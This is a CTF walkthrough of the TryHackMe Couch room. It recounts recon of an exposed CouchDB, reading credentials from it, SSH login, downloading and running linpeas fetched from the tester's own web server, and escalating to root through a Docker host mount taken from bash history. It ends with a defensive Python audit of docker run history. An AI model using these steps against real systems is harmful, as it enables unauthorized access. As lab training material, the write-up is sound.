YouTube!
This is my first writeup with a YouTube video, and it’s for the Try Hack Me Couch room!
You can watch it here or continue reading below!
The Couch Writeup!
So, I decided on the Couch room on Try Hack Me (links to the room are at the bottom).
This was an interesting room to complete as it has quite a clever predetermined path to privesc, maybe I just made it harder than I needed to….
Brief
The brief has a few additional steps. I identified 3, and if you follow the writeup you will be able to answer all of them. The three I identified were:
- Find the credentials in the database
- Identify the User.txt flag
- Find the Root.txt flag
Starting Out
As always, I started out with an Nmap scan with the following parameters:
nmap -sV -sC -p- -oN ./nmap/initial <THM_IP>
These are the results I got;

So no HTTP site on 80, but CouchDB on 5984. Sometimes -p- on nmap is worth it!
Let’s have a look at that HTTP site on 5984.

Amazing!
Two options now: I can either read the CouchDB technical documentation or I can see if Gobuster finds anything.
Let’s try Gobuster first using the below;
gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt
# if you don't have a big.txt wordlist, you can substitute this for one you have
The results weren’t great……

So, let’s amend our Gobuster command to;
gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt -b 400,404
# Gobuster normally filters out 404, but if you use -b you have to put 404 back in there or it won't filter those out too
This looks better;

Use the _utils page and we will see what’s in the database;

If you click through secret, you will find the credentials you need for Atena.
Atena and Her SSH
So, let’s pretend to be Atena by using the below;
ssh atena@<THM_IP>
Obviously, we’re going to ls to see what Atena has in her home directory…..

The user flag is ours!
Let’s Escalate!
So being Atena was great and all, but we need root!
There’s a couple of options out there, but I decided to upload linpeas and run it
# Start a webserver in the directory you have linpeas stored, take note of the port
python3 -m http.server
# From the THM Box side
wget http://<Your_THM_IP>:<Your_Webserver_port>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
So after letting this run, a couple of things stood out to me in addition to what linpeas was marking up;
- Docker was installed and, while not directly vulnerable, it’s not always on a THM Box
- Bash history was readable by the user
So let’s sneakily read Atena’s history
cat .bash_history

There is a lot in there, but that Docker command is interesting, so let’s copy it and run it!
Docker
So we are now inside a container.
From here I tried to cd to root with no luck, so instead I tried the following
cd mnt
ls
cd root
ls
cat root.txt

We have it!
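For anyone defending a box like this, here is an added example (not part of the original writeup or the room) that audits shell history for docker run commands that expose the host to a container. The writeup does not reproduce the Docker command, so the history lines and image names below are constructed, and the check assumes the host filesystem was bind-mounted into the container, which is consistent with root.txt turning up under mnt/root.

```python
import os
import shlex

# Host paths that hand a container control of the host when bind-mounted.
SENSITIVE = {"/", "/etc", "/root", "/var/run/docker.sock", "/run/docker.sock"}
# Constructed sample history (hypothetical image names), not taken from the room.
SAMPLE_HISTORY = """\
ls -la
docker ps
docker run -d -p 8080:80 -v /srv/www:/usr/share/nginx/html:ro example/web
sudo docker run --rm -it -v /:/mnt example/tools
docker run --mount type=bind,source=/var/run/docker.sock,target=/var/run/docker.sock example/agent
docker run --privileged example/builder
"""

def bind_sources(args):
    """Yield the host side of every -v/--volume/--mount option in a docker argument list."""
    it = iter(args)
    for tok in it:
        flag, _, spec = tok.partition("=")
        if flag not in ("-v", "--volume", "--mount"):
            continue
        spec = spec or next(it, "")            # "-v SPEC" form: spec is the next token
        if flag == "--mount":                  # type=bind,source=/host,target=/ctr
            opts = dict(kv.partition("=")[::2] for kv in spec.split(","))
            spec = opts.get("source") or opts.get("src") or ""
        host = spec.split(":")[0]              # /host:/ctr[:ro]
        if host.startswith("/"):               # named volumes are not host paths
            yield os.path.normpath(host)

def audit_line(line):
    """Return the findings for one history line (empty list if nothing risky)."""
    try:
        tokens = shlex.split(line)
    except ValueError:                         # unbalanced quotes in the history file
        return []
    names = [os.path.basename(t) for t in tokens]
    args = tokens[names.index("docker") + 1:] if "docker" in names else []
    if not {"run", "create"} & set(args):
        return []
    findings = ["--privileged"] if "--privileged" in args else []
    findings += [f"bind mount of host path {p}" for p in bind_sources(args) if p in SENSITIVE]
    return findings

def audit_history(text):
    """Return [(line_number, findings)] for every risky docker invocation in a history file."""
    rows = ((n, audit_line(l)) for n, l in enumerate(text.splitlines(), 1))
    return [(n, f) for n, f in rows if f]
```

Arguments after the image name are scanned too, so the check over-reports rather than misses; treat hits as leads to review alongside who can reach the Docker daemon.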
Try Hack Me Couch Conclusion
I did enjoy that box!
Maybe I went round the houses for the privesc and should have just tried bash history first, but this is where a tool like linpeas really comes into its own, because if it wasn’t that then I’d have been going down a different route.
I hope you enjoyed attempting this room too!
Links
Go to Tryhackme.com for this and many more CTFs
Room – TryHackMe Couch Room – Thank you to stuxnet for creating this!
Contact me – Any suggestions or room requests, get in touch!